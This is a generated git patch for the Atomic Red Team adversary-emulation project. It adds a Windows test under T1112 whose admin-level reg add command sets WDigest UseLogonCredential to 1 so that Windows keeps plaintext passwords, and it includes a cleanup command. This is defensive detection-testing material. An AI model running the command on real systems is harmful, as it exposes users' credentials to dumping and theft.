From ff779dd2fb609c7d16a12fc400794f83ffbaf1f9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 17 Sep 2019 14:45:16 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1112/T1112.md | 22 ++++++++++++++++++++++ atomics/index.md | 1 + atomics/index.yaml | 17 +++++++++++++++++ atomics/windows-index.md | 1 + 4 files changed, 41 insertions(+) diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index dac4677b..3a4d075f 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -16,6 +16,8 @@ The Registry of a remote system may be modified to aid in execution of files as - [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile) +- [Atomic Test #4 - Modify registry for password downgrade to plain text](#atomic-test-4---modify-registry-for-password-downgrade-to-plain-text) +
@@ -116,4 +118,24 @@ reg unload "HKU\$($ProfileList[$p].SID)" +
+
+ +## Atomic Test #4 - Modify registry for password downgrade to plain text +Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping) + +**Supported Platforms:** Windows + + +#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +``` +reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f +``` + + +#### Cleanup Commands: +``` +reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f +``` +
diff --git a/atomics/index.md b/atomics/index.md index 567f2776..01aadace 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -282,6 +282,7 @@ - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows] - Atomic Test #2: Modify Registry of Local Machine - cmd [windows] - Atomic Test #3: Modify Registry of Another User Profile [windows] + - Atomic Test #4: Modify registry for password downgrade to plain text [windows] - [T1170 Mshta](./T1170/T1170.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - [T1096 NTFS File Attributes](./T1096/T1096.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index 8e6d4189..4be6525f 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -8156,6 +8156,23 @@ defense-evasion: ### Garbage collection and closing of ntuser.dat ### [gc]::Collect() reg unload "HKU\$($ProfileList[$p].SID)" + - name: Modify registry for password downgrade to plain text + description: "Sets registry key that will tell windows to store plaintext passwords + (making the system vulnerable to clear text / cleartext password dumping) + \n" + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: true + command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest + /v UseLogonCredential /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest + /v UseLogonCredential /t REG_DWORD /d 0 /f + +' T1170: technique: external_references: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 1db34349..6a31951f 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -89,6 +89,7 @@ - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows] - Atomic Test #2: Modify Registry of Local Machine - cmd [windows] - Atomic Test #3: Modify Registry of Another User Profile [windows] + - Atomic Test #4: Modify registry for password downgrade to plain text [windows] - [T1170 Mshta](./T1170/T1170.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - [T1096 NTFS File Attributes](./T1096/T1096.md)